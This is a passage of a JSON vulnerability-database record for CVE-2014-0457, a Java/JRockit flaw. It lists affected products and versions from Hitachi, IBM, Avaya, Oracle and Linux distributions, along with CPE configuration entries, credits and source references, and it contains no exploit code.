r28.1.4", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "cosminexus application server enterprise 06-02-/f", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "enterprise linux desktop client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.1.185" }, { "model": "jrockit r27.6.6", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "cosminexus client 06-50-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2" }, { "model": "ucosminexus application server enterprise )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus client )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "jrockit r27.6.8", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1.2" }, { "model": "cosminexus primary server base 06-50-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "ucosminexus primary server base (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7" }, { "model": "ucosminexus developer light 06-70-/f", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer professional 06-51-/n", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "runtimes for java technology 7.sr7", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "ucosminexus developer professional for plug-in (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus operator", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "jre beta", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5.0" }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "cosminexus developer light 06-02-/g", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer professional )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-02" }, { "model": "jrockit r27.6.4", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "aura system manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "ucosminexus developer )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0107-10" }, { "model": "cosminexus primary server base 06-50-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer 05-01-/l", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.1" }, { "model": "hp-ux b.11.23", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "ucosminexus client )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "vcenter server", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5" }, { "model": "jrockit r27.7.6", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5" }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-72" }, { "model": "ucosminexus client for plug-in )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "ucosminexus developer light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-70" }, { "model": "cosminexus developer professional 06-00-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.3" }, { "model": "ucosminexus service architect )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "cosminexus application server standard 06-51-/n", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1.1" }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-72" }, { "model": "linux lts i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "ucosminexus client )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "cosminexus developer", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "05-01" }, { "model": "ucosminexus developer standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.1.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "ucosminexus service architect )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "cosminexus application server standard 06-50-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "cosminexus studio", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "05-01" }, { "model": "ucosminexus application server express )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "cosminexus developer professional 06-50-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus service architect )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "jdk 0 09", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.5" }, { "model": "cosminexus developer standard 06-00-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server standard )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "cosminexus primary server base 06-51-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.1" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "ucosminexus client (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus developer professional for plug-in )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53003.0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0109-50" }, { "model": "ucosminexus application server standard-r )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "jdk 1.6.0 01-b06", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "aura conferencing", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "jrockit r28.2.9", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "6" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "linux", "scope": null, "trust": 0.3, "vendor": "gentoo", "version": null }, { "model": "jdk 1.5.0.0 03", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "cosminexus developer standard 06-02-/g", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "cosminexus application server standard 06-00-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server enterprise (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "java se embedded 7u51", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "ucosminexus application server express )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "cosminexus application server standard 06-02-/f", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "cosminexus developer professional 06-50-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-60" }, { "model": "ucosminexus application server standard-r (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "ucosminexus application server standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus operator )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "ucosminexus application server smart edition )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-50" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "jrockit r28.2.8", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "jrockit r27.6.2", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "ucosminexus developer professional for plug-in )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "ucosminexus developer light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "linux enterprise java sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "ucosminexus developer standard 06-70-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4" }, { "model": "ucosminexus application server standard-r )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.1" }, { "model": "ucosminexus developer professional for plug-in )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus application server smart edition (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "cosminexus developer professional 06-02-/g", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus application server 05-05-/o", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "jrockit r27.6.9", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "ucosminexus developer professional for plug-in", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus primary server base )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "ucosminexus application server enterprise 06-70-/p", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "jrockit r27.6.3", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "cosminexus developer 05-00-/s", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server smart edition", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "runtimes for java technology sr16-fp6", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "ucosminexus primary server base", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "linux enterprise server sp3 ltss", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "cosminexus application server enterprise )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-02" }, { "model": "cosminexus developer 05-00-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cics transaction gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "forms viewer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "forms viewer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "ucosminexus service platform messaging", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-09-50" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2.177" }, { "model": "ucosminexus service architect", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus developer standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-72" }, { "model": "ucosminexus service platform messaging (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-07-00" }, { "model": "jre 1.5.0 09", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2" }, { "model": "hp-ux b.11.11", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.0" }, { "model": "cosminexus developer", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "05-02" }, { "model": "ucosminexus operator )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.0" }, { "model": "ucosminexus primary server base )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "ucosminexus application server enterprise 06-72-/d", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus application server standard 06-50-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server express )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "ucosminexus developer )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0109-00" }, { "model": "ucosminexus developer light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "cosminexus client 06-50-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server enterprise 06-71-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.2.13" }, { "model": "ucosminexus application server standard-r", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.3" }, { "model": "ucosminexus client for plug-in )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1x8664" }, { "model": "cosminexus client 06-02-/g", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.10" }, { "model": "aura collaboration environment", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "ucosminexus service platform messaging )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-07-10" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.3" }, { "model": "cosminexus studio 05-05-/r", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "jrockit r28.1.3", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "ucosminexus client 06-70-/a (windows(ip", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "forms viewer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0.1" }, { "model": "ucosminexus developer )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0109-50" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2.178" }, { "model": "messaging application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "ucosminexus application server light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "java se embedded 7u40", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "cosminexus client 06-00-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus application server enterprise 06-50-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "aura presence services sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "cosminexus primary server base 06-51-/n", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus application server standard )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-02" }, { "model": "runtimes for java technology sr16", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "cosminexus studio 05-00-/s", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer standard 06-70-/a (windows(ip", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "ucosminexus application server express (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus service platform messaging", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-09-00" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.9" }, { "model": "ucosminexus service platform messaging (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-08-00" }, { "model": "ucosminexus application server express", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "cosminexus application server 05-01-/l", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus client )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "linux enterprise server sp1 ltss", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "5" }, { "model": "cosminexus application server", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "05-02" }, { "model": "ucosminexus application server standard 06-72-/d", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cics transaction gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.8" }, { "model": "endpoint manager for remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1" }, { "model": "jdk 1.5.0 07-b03", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "cosminexus application server standard 06-51-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer light (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "cosminexus application server standard 06-51-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "cosminexus application server enterprise 06-51-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus service platform messaging )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-08-20" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2.145" }, { "model": "ucosminexus application server standard-r )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus client 06-72-/d", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus service platform (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "ucosminexus service architect (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1.0" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "cosminexus application server enterprise 06-51-/n", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server smart edition )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "cosminexus primary server base 06-02-/d", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus operator )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "vcenter update manager", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5" } ], "sources": [ { "db": "ZDI", "id": "ZDI-14-105" }, { "db": "BID", "id": "66866" }, { "db": "CNNVD", "id": "CNNVD-201404-272" }, { "db": "NVD", "id": "CVE-2014-0457" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r27.8.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r28.3.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:13.10:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:12.10:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:10.04:*:*:*:-:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:-:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:juniper:junos_space:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "15.1", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update51:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update51:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.8.0:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.8.0:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.5.0:update61:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update71:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.5.0:update61:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update71:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:ibm:forms_viewer:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "8.0.1.1", "versionStartIncluding": "8.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ibm:forms_viewer:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "4.0.0.3", "versionStartIncluding": "4.0.0", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2014-0457" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Ben Murphy", "sources": [ { "db": "ZDI", "id": "ZDI-14-105" } ], "trust": 0.7 }, "cve": "CVE-2014-0457", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { 